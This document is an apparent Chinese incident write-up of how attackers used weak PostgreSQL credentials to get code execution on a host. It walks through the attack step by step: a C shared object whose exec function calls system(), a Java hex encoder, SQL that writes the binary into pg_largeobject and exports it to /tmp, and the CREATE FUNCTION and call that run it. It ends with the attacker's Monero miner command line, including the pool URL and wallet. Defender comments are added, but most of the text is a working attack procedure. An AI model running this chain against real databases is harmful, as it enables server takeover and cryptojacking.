1. 首先通过端口扫描发现 PostgreSQL 服务，并得到弱口令账号密码
2. 利用 UDF（自定义函数）：先在本地编译生成 so 文件，再上传到服务器
参考:https://www.postgresql.org/docs/9.5/static/xfunc-c.html
gcc cmd2.c -I`pg_config --includedir-server` -fPIC -shared -o cmd.so
cmd2.c:
#include "stdlib.h"
#include "postgres.h"
#include <string.h>
#include "utils/geo_decls.h"
#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif
/* by value */
/*
 * Demonstration payload loaded through CREATE FUNCTION ... LANGUAGE C.
 * The shell command is run by the database server process itself, so it
 * executes as the server's OS user, independent of the SQL caller; the
 * argument is returned unchanged only so the SQL call has a result.
 * Defender note: any C function loaded from an arbitrary shared object
 * has exactly this level of access, which is why the right to create
 * C-language functions must stay with trusted superusers only.
 */
int exec(int arg){
    system("ls /root -al> /tmp/result");
    return arg;
}
/*
 * Pass-by-value example from the PostgreSQL C-function docs: returns the
 * integer argument incremented by one.
 */
int
add_one(int arg)
{
    const int step = 1;
    int incremented = step + arg;

    return incremented;
}
/* by reference, fixed length */
/*
 * Pass-by-reference, fixed-length example: allocates a new float8 in the
 * current memory context and stores the argument plus one in it.
 */
float8 *
add_one_float8(float8 *arg)
{
    float8 *incremented = (float8 *) palloc(sizeof(*incremented));

    *incremented = 1.0 + *arg;
    return incremented;
}
/*
 * Builds a new Point whose x comes from the first argument and whose y
 * comes from the second; the result is palloc'd, not a pointer to either input.
 */
Point *
makepoint(Point *pointx, Point *pointy)
{
    Point *combined = (Point *) palloc(sizeof(*combined));

    combined->y = pointy->y;
    combined->x = pointx->x;
    return combined;
}
/* by reference, variable length */
/*
 * Returns a freshly palloc'd copy of the variable-length text value t.
 * VARSIZE(t) already includes the VARHDRSZ header, so both the allocation
 * and the stored size are the full struct size; only the payload bytes
 * (VARSIZE - VARHDRSZ) are copied out of the data region.
 */
text *
copytext(text *t)
{
    int32 total_size = VARSIZE(t);
    text *copy = (text *) palloc(total_size);

    SET_VARSIZE(copy, total_size);
    memcpy(VARDATA(copy), VARDATA(t), total_size - VARHDRSZ);
    return copy;
}
/*
 * Concatenates two text values into a new palloc'd text. The result holds
 * one header plus both payloads, so its size is the two VARSIZEs minus the
 * header counted twice.
 */
text *
concat_text(text *arg1, text *arg2)
{
    int32 len1 = VARSIZE(arg1) - VARHDRSZ;
    int32 len2 = VARSIZE(arg2) - VARHDRSZ;
    int32 total_size = VARHDRSZ + len1 + len2;
    text *joined = (text *) palloc(total_size);

    SET_VARSIZE(joined, total_size);
    memcpy(VARDATA(joined), VARDATA(arg1), len1);
    memcpy(VARDATA(joined) + len1, VARDATA(arg2), len2);
    return joined;
}
Java 工具：将 cmd.so 二进制文件转换为十六进制字符串，每行对应不超过 2 kB 的二进制数据
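/**
 * Hex-encodes a byte array as uppercase ASCII, inserting a CRLF after every
 * 2048 input bytes so that each output line corresponds to one 2048-byte
 * chunk of the input.
 *
 * Same contract as before; the output is now accumulated in a pre-sized
 * StringBuilder instead of repeated String concatenation, which was
 * quadratic in the input length.
 *
 * Defender note: in this write-up the lines produced here are the hex
 * literals passed to decode(..., 'hex') in the pg_largeobject INSERTs, so
 * unusually long hex literals in statement logs are a recognisable trace.
 *
 * @param data bytes to encode; an empty array yields an empty string
 * @return two uppercase hex characters per input byte, with "\r\n" after
 *         every 2048th byte
 */
public static String byteToArray(byte[] data) {
    final String hexDigits = "0123456789ABCDEF";
    // Two characters per byte plus room for one CRLF per full 2048-byte chunk.
    StringBuilder result = new StringBuilder(data.length * 2 + (data.length / 2048) * 2);
    for (int i = 0; i < data.length; i++) {
        int value = data[i] & 0xFF;
        result.append(hexDigits.charAt(value >>> 4));
        result.append(hexDigits.charAt(value & 0x0F));
        // Line break after every 2048th byte, including the last byte when
        // the length is an exact multiple of 2048 (matches the original).
        if ((i + 1) % 2048 == 0) {
            result.append("\r\n");
        }
    }
    return result.toString();
}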
/**
 * Entry point of the converter: reads a shared object from a hard-coded
 * local path and prints its hex encoding (via byteToArray) to stdout.
 *
 * The path is fixed at compile time and names libtest.so, while the rest
 * of the write-up refers to the compiled file as cmd.so. FileUtils appears
 * to be a library helper rather than java.io; its import is outside this
 * excerpt.
 *
 * @param args ignored
 * @throws Exception propagated from the file read
 */
public static void main(String[] args) throws Exception {
    byte[] data=FileUtils.readFileToByteArray(new File("C:\\Users\\martin\\Downloads\\package\\libtest.so"));
    String result=byteToArray(data);
    System.out.println(result);
}
通过 SQL 命令，将 cmd.so 导出到服务器的 /tmp 目录下
-- Staging the shared object inside the database: its bytes are written
-- page by page into the pg_largeobject catalog and then exported to the
-- server's filesystem.
-- Defender notes:
--   * lo_creat(-1) allocates a fresh large-object OID; the literal 390334
--     used below is presumably the value that call returned in the
--     author's session, so it differs from run to run.
--   * Direct INSERT/DELETE on pg_largeobject and a server-side lo_export
--     that writes a file are catalog and filesystem operations an
--     application role should never hold; by default they require
--     superuser rights (confirm for the server version in use), which is
--     why the weak credential is the root cause here.
--   * Statements that touch pg_largeobject directly, or lo_export with a
--     target under /tmp, are useful audit-log signatures for this technique.
select lo_creat(-1);
-- Remove any pages already stored under that OID (filtered by loid, not a full-table delete).
delete from pg_largeobject where loid=390334
-- Confirm the OID holds no pages before uploading.
select * from pg_largeobject where loid=390334
-- One row per page (pageno 0, 1, 2, ...); each hex literal is presumably
-- one line of the Java converter's output, i.e. one 2048-byte chunk.
insert into pg_largeobject (loid,pageno,data) values(390334,0,decode(''FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,1,decode(''FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,2,decode('FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,3,decode(''FFXXXXXXXXXXXXX....','hex'))
;
-- Writes the reassembled object to disk; the file is created by the server
-- process, so it is owned by the server's OS user.
SELECT lo_export(390334, '/tmp/cmd.so'); //导出 到 /tmp 目录
创建函数:
-- Registers the exported shared object as a SQL-callable C function.
-- Defender notes: creating LANGUAGE C functions from an arbitrary file
-- path is a superuser-level action, and it is exactly the step that turns
-- database access into code execution on the host. With log_statement set
-- to 'ddl' (or 'all') this CREATE FUNCTION appears in the server log and
-- can be alerted on; the referenced .so under /tmp is a second indicator.
CREATE or replace FUNCTION exec(integer) RETURNS integer
AS '/tmp/cmd.so', 'exec'
LANGUAGE C STRICT;
执行自定义函数（cmd2.c 中的 exec 方法）：
-- Invokes the loaded function; the shell command inside exec runs on the
-- database host at this point. The '1' is only the integer argument the
-- function echoes back, so the query result ("1") reveals nothing about
-- what the command did.
select exec('1')
在该方法中可以执行启动进程等操作。我们公司的 2 台阿里云服务器上的 postgres 就是被人用这种方式放入了挖矿程序，导致 CPU 占用率 100%；研究了一天才搞清楚原理，解决方法是将 postgresql 密码修改为复杂密码。
附:
黑客启动的挖矿程序进程命令行：
/tmp/iftghlv -c x -M
stratum+tcp://49rR8E9A3CZN2jdNpJK4NMLYKCM9TLbSEAB4m9FxLgXZC4pvz6mWfxK6NRHv9Y3C3Xa9nqRLjUUHfU7werrSne1DP3Ufgw2:x@xmr.crypto-pool.fr:3333/xmr